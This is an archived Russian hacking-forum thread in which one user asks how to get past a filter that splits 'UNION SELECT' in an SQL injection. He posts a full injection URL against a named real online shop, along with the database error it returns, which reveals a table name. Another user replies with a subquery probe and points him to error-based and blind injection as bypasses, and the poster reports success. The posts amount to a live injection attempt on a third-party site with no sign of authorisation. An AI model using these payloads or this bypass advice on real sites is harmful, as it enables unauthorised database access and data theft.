Добро пожаловать! Это — архивная версия форумов на «Хакер.Ru». Она работает в режиме read-only.
 

SQL обход фильтрации

Пользователи, просматривающие топик: none

Зашли как: Guest
Все форумы >> [Уязвимости] >> SQL обход фильтрации
Имя
Сообщение << Старые топики   Новые топики >>
SQL обход фильтрации - 2011-01-09 20:52:58.010000   
GaMeSTeR001

Сообщений: 103
Оценки: 0
Присоединился: 2010-05-04 16:55:31.473333
Как обойти фильтрацию UNION SELECT скрипт вставляет пробелы - получается UNI ON SEL ECT в итоге ошибка
Post #: 1
RE: SQL обход фильтрации - 2011-01-10 06:46:08.946666   
S00pY

Сообщений: 785
Оценки: 0
Присоединился: 2007-04-14 20:44:05.376666
Опишите ситуацию точнее
Фильтруеца только union select или select в подзапросах тоже фильтруется?
Вообщем все от конкретного случая, ссылку в студию
Post #: 2
RE: SQL обход фильтрации - 2011-01-10 10:26:49.480000   
GaMeSTeR001

Сообщений: 103
Оценки: 0
Присоединился: 2010-05-04 16:55:31.473333
http://www.beauty-shop.ru/info/detail.php?ID=1227'+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33+–+
Ответ хоста:
MySQL Query Error: SELECT * FROM `b_iblock_element` WHERE `ID` = '1227' UNI ON SEL ECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33 – ' [You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'UNI ON SEL ECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25' at line 3]
Post #: 3
RE: SQL обход фильтрации - 2011-01-10 11:29:27.143333   
S00pY

Сообщений: 785
Оценки: 0
Присоединился: 2007-04-14 20:44:05.376666
Работать по ru это не по мужски!!!

Искать обходы фильтров за вас не буду…

Попробуйте обыкновенный подзапрос например SELECT * FROM `b_iblock_element` WHERE `ID` = '1227' AND (SELECT 1)=1–+
Фильтруется ли просто select ?
Post #: 4
RE: SQL обход фильтрации - 2011-01-10 12:23:21.916666   
GaMeSTeR001

Сообщений: 103
Оценки: 0
Присоединился: 2010-05-04 16:55:31.473333
Это просто для практики.
select не фильтруется получается фильтруется только сочетание UNION SELECT как можно обойти такой фильтр?
Post #: 5
RE: SQL обход фильтрации - 2011-01-10 12:35:14.383333   
S00pY

Сообщений: 785
Оценки: 0
Присоединился: 2007-04-14 20:44:05.376666
Можно обойтись без union


Google -> error based sql-inj


Or

Blind sql-inj
Post #: 6
RE: SQL обход фильтрации - 2011-01-10 16:41:09.606666   
GaMeSTeR001

Сообщений: 103
Оценки: 0
Присоединился: 2010-05-04 16:55:31.473333
Спасибо! Нашел как обойти
Post #: 7
Страниц:  [1]
Все форумы >> [Уязвимости] >> SQL обход фильтрации







Связаться:
Вопросы по сайту / xakep@glc.ru

Предупреждение: использование полученных знаний в противозаконных целях преследуется по закону.